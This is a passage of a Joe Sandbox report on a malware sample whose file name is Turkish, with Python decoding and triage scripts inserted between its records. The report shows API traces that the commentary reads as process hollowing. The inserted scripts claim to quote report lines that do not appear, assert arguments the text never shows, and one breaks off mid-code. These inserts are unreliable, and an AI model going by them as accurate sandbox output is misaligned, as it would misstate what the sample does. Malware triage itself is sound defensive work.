                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1372826849-0
                                                                                                                                    • Opcode ID: a8cc5b30400110ae8be88ac2822e319dc919e04cb29339a6ed2c1dde5f95613f
                                                                                                                                    • Instruction ID: d40958edd2aec18157dce7269f34f228146a7dead5a38277c1024339c972e226
                                                                                                                                    • Opcode Fuzzy Hash: a8cc5b30400110ae8be88ac2822e319dc919e04cb29339a6ed2c1dde5f95613f
                                                                                                                                    • Instruction Fuzzy Hash: 6D01D632640B1BDAD6202774AE43F6D77489F82BB1F50002DF4059A181DF79ACC17760
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,01009548,?,?,?,?,?,00000004), ref: 010098BB
                                                                                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,01009548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 010098D1
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,01009548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 010098D8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3397143404-0
                                                                                                                                    • Opcode ID: 4ac938634dffb74bb4045f38a56317755339c6fcee7e44990ca42d902e855a7c
                                                                                                                                    • Instruction ID: 60e5907c9387a4bb4a90c29552d641cbefa086cb1084a3f2fd138cd001ecc254
                                                                                                                                    • Opcode Fuzzy Hash: 4ac938634dffb74bb4045f38a56317755339c6fcee7e44990ca42d902e855a7c
                                                                                                                                    • Instruction Fuzzy Hash: E4E08632141215B7E7311E54EC0AFCA7F69AB067A4F308210FB94690D087B616119798
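The API lines in these records print raw hexadecimal stack arguments, and the listing also prints stack slots beyond an API's declared parameter count (the "?,01009548,..." tail after CreateFileW's seven real parameters), so the flags are easy to misread. The following Python decoder is an added example and not part of the Joe Sandbox report or its IDA plugin: it parses a copy of the GetTempFileNameW, MapVirtualKeyW, CreateFileW, SetFileTime and CloseHandle lines shown in the records above (embedded below as constructed input) and maps the arguments to their documented Win32 constant names. The line regular expression and the per-API parameter counts are assumptions about the report's format; the constant values are the documented ones from winnt.h, fileapi.h and winuser.h.

```python
import re

# Constructed input: copies of API lines from the function records above.
REPORT_LINES = """\
• GetTempPathW.KERNEL32(00000104,?), ref: 010098F8
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0100990F
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FC0193
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,01009548,?,?,?,?,?,00000004), ref: 010098BB
• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,01009548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 010098D1
• CloseHandle.KERNEL32(00000000,?,01009548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 010098D8
"""

# Assumed shape of one report line: "Api.MODULE(arg,arg,...), ref: ADDR".
CALL_RE = re.compile(
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Documented Win32 constants.
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTR = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
             0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x80000000: "FILE_FLAG_WRITE_THROUGH"}
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
                0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}

# Declared parameter counts (assumption: the report prints extra stack slots
# after the real arguments, which must be dropped before decoding).
PARAM_COUNT = {"CreateFileW": 7, "SetFileTime": 4, "CloseHandle": 1,
               "GetTempFileNameW": 4, "GetTempPathW": 2, "MapVirtualKeyW": 2}


def parse_call(line):
    """Split one report line into name, module, real arguments and ref address."""
    m = CALL_RE.search(line)
    if not m:
        return None
    args = [a.strip() for a in m.group("args").split(",")]
    n = PARAM_COUNT.get(m.group("name"))
    return {"name": m.group("name"), "module": m.group("module"),
            "args": args[:n] if n else args, "ref": m.group("ref")}


def as_int(tok):
    """Eight-digit hex tokens become ints; '?' and string literals stay None."""
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else None


def decode_flags(value, table):
    """Name every known bit in value and return the bits the table lacks."""
    names = [name for bit, name in table.items() if value & bit]
    unknown = value & ~sum(table)
    return names, unknown


def names_of(value, table):
    return "?" if value is None else decode_flags(value, table)[0]


def decode_call(call):
    """Attach constant names to the arguments of the APIs seen in this report."""
    name, args = call["name"], call["args"]
    ints = [as_int(a) for a in args]
    out = {"api": name, "module": call["module"], "ref": call["ref"]}
    if name == "CreateFileW":
        out["dwDesiredAccess"] = names_of(ints[1], GENERIC_ACCESS)
        out["dwShareMode"] = names_of(ints[2], SHARE_MODE)
        disp = ints[4]
        out["dwCreationDisposition"] = DISPOSITION.get(disp, "?" if disp is None else hex(disp))
        out["dwFlagsAndAttributes"] = names_of(ints[5], FILE_ATTR)
    elif name == "GetTempFileNameW":
        out["lpPrefixString"] = args[1]   # the report prints the literal prefix
        out["uUnique"] = ints[2]          # 0 asks the API to pick a unique number
    elif name == "MapVirtualKeyW":
        code = ints[0]
        out["uCode"] = VIRTUAL_KEYS.get(code, "?" if code is None else hex(code))
    return out


def decode_report(text):
    """Decode every API line in a block of report text, in order."""
    calls = (parse_call(line) for line in text.splitlines())
    return [decode_call(c) for c in calls if c]


if __name__ == "__main__":
    for entry in decode_report(REPORT_LINES):
        print(entry)
```

Decoded, the CreateFileW call is a GENERIC_WRITE, FILE_SHARE_READ, OPEN_EXISTING open with FILE_ATTRIBUTE_NORMAL, immediately followed by SetFileTime and CloseHandle: that is the sequence that rewrites the timestamps of a file that already exists, which is the check to make on any file the sample drops. The GetTempFileNameW call asks for a name with the prefix "aut" under the path returned by GetTempPathW, and the MapVirtualKeyW arguments are the modifier keys (VK_LWIN, VK_SHIFT, VK_LSHIFT, VK_RSHIFT, VK_CONTROL, VK_MENU).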
                                                                                                                                    APIs
                                                                                                                                    • _free.LIBCMT ref: 01008D1B
                                                                                                                                      • Part of subcall function 00FC2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00FC9A24), ref: 00FC2D69
                                                                                                                                      • Part of subcall function 00FC2D55: GetLastError.KERNEL32(00000000,?,00FC9A24), ref: 00FC2D7B
                                                                                                                                    • _free.LIBCMT ref: 01008D2C
                                                                                                                                    • _free.LIBCMT ref: 01008D3E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                    • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                                    • Instruction ID: 2cfa348369af864702244ffb73a78d48128ab9bb1ba841def208706520f4fcfa
                                                                                                                                    • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                                    • Instruction Fuzzy Hash: 3BE0C2E1E0160243EBA1B5BCAE41F8333DC9F68352B044A6FB94ED7182CE68F4429028
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: CALL
                                                                                                                                    • API String ID: 0-4196123274
                                                                                                                                    • Opcode ID: 1251beb3b2dd0786ff0f65e858b0d279e7f960efc8268bca20115fda891bf82b
                                                                                                                                    • Instruction ID: 1f21a54c65406773310ab65b23f38170250882b497d18f388218d41ad6bab436
                                                                                                                                    • Opcode Fuzzy Hash: 1251beb3b2dd0786ff0f65e858b0d279e7f960efc8268bca20115fda891bf82b
                                                                                                                                    • Instruction Fuzzy Hash: 78227FB1908301DFD724DF14C450B6AB7E1BF86314F14896DE89A8B362DB35ED45EB82
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memmove
                                                                                                                                    • String ID: EA06
                                                                                                                                    • API String ID: 4104443479-3962188686
                                                                                                                                    • Opcode ID: 47ecbecd0ef2702ad90c8893bcbe50ef8fdb1812d85fff664dd993b87dda5bed
                                                                                                                                    • Instruction ID: f53476245f069f45f9735579002b07dedabf9b3537c62e712c71414d7ba3b6c0
                                                                                                                                    • Opcode Fuzzy Hash: 47ecbecd0ef2702ad90c8893bcbe50ef8fdb1812d85fff664dd993b87dda5bed
                                                                                                                                    • Instruction Fuzzy Hash: 37417FF2E041586BDF219B54CC917BE7BA29BC7310F284475FC86DB282D6A47D44B3A1
                                                                                                                                    APIs
                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 01005B93
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharLower
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2358735015-0
                                                                                                                                    • Opcode ID: 882ec0f033ced3baddc04fa2aa3942b93c07abfc5491e8a0e7037e2b1018c8d9
                                                                                                                                    • Instruction ID: ad310f6a82b11b2274b81c40017b32d8334c4dd2d1b410d4ff843eb0c753266d
                                                                                                                                    • Opcode Fuzzy Hash: 882ec0f033ced3baddc04fa2aa3942b93c07abfc5491e8a0e7037e2b1018c8d9
                                                                                                                                    • Instruction Fuzzy Hash: 2B418472500609AFEB16EF64CC81DAFB7F8EB44310F10866EE99697281EB749A45CF50
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4104443479-0
                                                                                                                                    • Opcode ID: dcaa55ca9a04723143b9e8694f613c9e7f590ea8bac40c6ab2e3bad66fc376f5
                                                                                                                                    • Instruction ID: a7ba441c8ec6ded86e2699d219c325bd4a7550b04b810b10d5774df20398e37c
                                                                                                                                    • Opcode Fuzzy Hash: dcaa55ca9a04723143b9e8694f613c9e7f590ea8bac40c6ab2e3bad66fc376f5
                                                                                                                                    • Instruction Fuzzy Hash: 803173F2604606AFC704EF68CCD1E69B3A9FF493207158629E519CB291EB34E951DB90
                                                                                                                                    APIs
                                                                                                                                    • IsThemeActive.UXTHEME ref: 00FA4834
                                                                                                                                      • Part of subcall function 00FC336C: __lock.LIBCMT ref: 00FC3372
                                                                                                                                      • Part of subcall function 00FC336C: DecodePointer.KERNEL32(00000001,?,00FA4849,00FF7C74), ref: 00FC337E
                                                                                                                                      • Part of subcall function 00FC336C: EncodePointer.KERNEL32(?,?,00FA4849,00FF7C74), ref: 00FC3389
                                                                                                                                      • Part of subcall function 00FA48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00FA4915
                                                                                                                                      • Part of subcall function 00FA48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FA492A
                                                                                                                                      • Part of subcall function 00FA3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FA3B68
                                                                                                                                      • Part of subcall function 00FA3B3A: IsDebuggerPresent.KERNEL32 ref: 00FA3B7A
                                                                                                                                      • Part of subcall function 00FA3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,010652F8,010652E0,?,?), ref: 00FA3BEB
                                                                                                                                      • Part of subcall function 00FA3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00FA3C6F
                                                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FA4874
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1438897964-0
                                                                                                                                    • Opcode ID: ee6866e893417aad04329eae228b875fc0d1239af0ba1de5f0ec06beff91d5cc
                                                                                                                                    • Instruction ID: 18cf250d74f3715a3646a8d9de1fa7808aa9739e8472d7a4d8e2e38422035ea5
                                                                                                                                    • Opcode Fuzzy Hash: ee6866e893417aad04329eae228b875fc0d1239af0ba1de5f0ec06beff91d5cc
                                                                                                                                    • Instruction Fuzzy Hash: FB11A5719083429FC710DF28EC0590ABFE8FF8A790F10451EF08083271DBBA9645DB91
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FC571C: __FF_MSGBANNER.LIBCMT ref: 00FC5733
                                                                                                                                      • Part of subcall function 00FC571C: __NMSG_WRITE.LIBCMT ref: 00FC573A
                                                                                                                                      • Part of subcall function 00FC571C: RtlAllocateHeap.NTDLL(011E0000,00000000,00000001,00000000,?,?,?,00FC0DD3,?), ref: 00FC575F
                                                                                                                                    • std::exception::exception.LIBCMT ref: 00FC0DEC
                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00FC0E01
                                                                                                                                      • Part of subcall function 00FC859B: RaiseException.KERNEL32(?,?,?,01059E78,00000000,?,?,?,?,00FC0E06,?,01059E78,?,00000001), ref: 00FC85F0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3902256705-0
                                                                                                                                    • Opcode ID: 6e49b6f955af899035ff4516bdc75fa0464762e6dc1752824de0df10b1f5805a
                                                                                                                                    • Instruction ID: 1ee8e6ef9339d48caede660fc5b685308583c15109273ba408d74782d6a97ac0
                                                                                                                                    • Opcode Fuzzy Hash: 6e49b6f955af899035ff4516bdc75fa0464762e6dc1752824de0df10b1f5805a
                                                                                                                                    • Instruction Fuzzy Hash: E6F0813190031BA6CB18BA94EE07FDF77AC9F01361F10442EF909A6141DF749A82A6D1
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __lock_file_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 26237723-0
                                                                                                                                    • Opcode ID: 6a7dee1f19cd275ced03a5c31750786f78da99f4326570a642ca6338ff1d9a75
                                                                                                                                    • Instruction ID: 5f68228a363fc795a06c4ae4cde90f677f2041aac3c1d290ba0b025e40ecf13c
                                                                                                                                    • Opcode Fuzzy Hash: 6a7dee1f19cd275ced03a5c31750786f78da99f4326570a642ca6338ff1d9a75
                                                                                                                                    • Instruction Fuzzy Hash: 2101D472C0060AEBCF12EF648E03E9E7B61AF90B61F40411DF8141B151DB398A92FF91
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FC8B28: __getptd_noexit.LIBCMT ref: 00FC8B28
                                                                                                                                    • __lock_file.LIBCMT ref: 00FC53EB
                                                                                                                                      • Part of subcall function 00FC6C11: __lock.LIBCMT ref: 00FC6C34
                                                                                                                                    • __fclose_nolock.LIBCMT ref: 00FC53F6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2800547568-0
                                                                                                                                    • Opcode ID: dcccabe42f2c9fadf697016d9722b4c6f4ebbc4ae4f96a93dad688807a9e2669
                                                                                                                                    • Instruction ID: 22bb090e561329186ffd7c8843d4cea43d945cecfb77899872be019aae3ff94c
                                                                                                                                    • Opcode Fuzzy Hash: dcccabe42f2c9fadf697016d9722b4c6f4ebbc4ae4f96a93dad688807a9e2669
                                                                                                                                    • Instruction Fuzzy Hash: 09F09C319106469AD714AB655E03FAD76A16F41775F20410CA454AB1C1CBFC5982BB51
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 01260065
                                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01260089
                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 012600AB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1492167049.000000000125E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0125E000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_125e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2438371351-0
                                                                                                                                    • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                                                                    • Instruction ID: fc7719b40e7cb49a70090d3b09c79bf35168b80e65ec4e184c0ce08184785c50
                                                                                                                                    • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                                                                    • Instruction Fuzzy Hash: 6212CE24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F91CF5A
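The three calls listed for the function dumped at 0125E000 above (CreateProcessW, then Wow64GetThreadContext with ContextFlags 00010007, then a four-byte ReadProcessMemory) are the opening moves of the RunPE / process-hollowing pattern: spawn a child, pull its initial thread context, and read a pointer out of the child's address space (in the classic 32-bit routine that pointer is the ImageBaseAddress in the child's PEB, reached through the context's Ebx register). The report also marks that dump "based on PE: false", so the code lives outside any mapped image. The script below is an added triage example, not part of the report or of Joe Sandbox: it parses the report's "APIs" lines into structured calls, decodes the CONTEXT flags, reports which hollowing stages are present and in what order, and reads the protection and type fields out of an .sdmp file name. The stage grouping, the ordering heuristic, the nSize=4 note and the reading of the .sdmp name fields are the example author's assumptions and are labelled as such in the code; the sample input is copied from the entry above.

```python
"""Triage helper for Joe Sandbox per-function 'APIs' lines and .sdmp dump names.
Added example (not Joe Sandbox code); every rule below is the example author's heuristic."""
import re
from dataclasses import dataclass

# Input copied from the report entry above (the function dumped at 0125E000).
SAMPLE_APIS = """\
• CreateProcessW.KERNELBASE(?,00000000), ref: 01260065
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01260089
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 012600AB
"""
SAMPLE_DUMP = "00000000.00000002.1492167049.000000000125E000.00000040.00000020.00020000.00000000.sdmp"

# One 'APIs' line: optional bullet, optional 'Part of subcall function XXXX:' prefix,
# Api.MODULE, optional (args), then 'ref: ADDR'. LIBCMT references carry no argument list.
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
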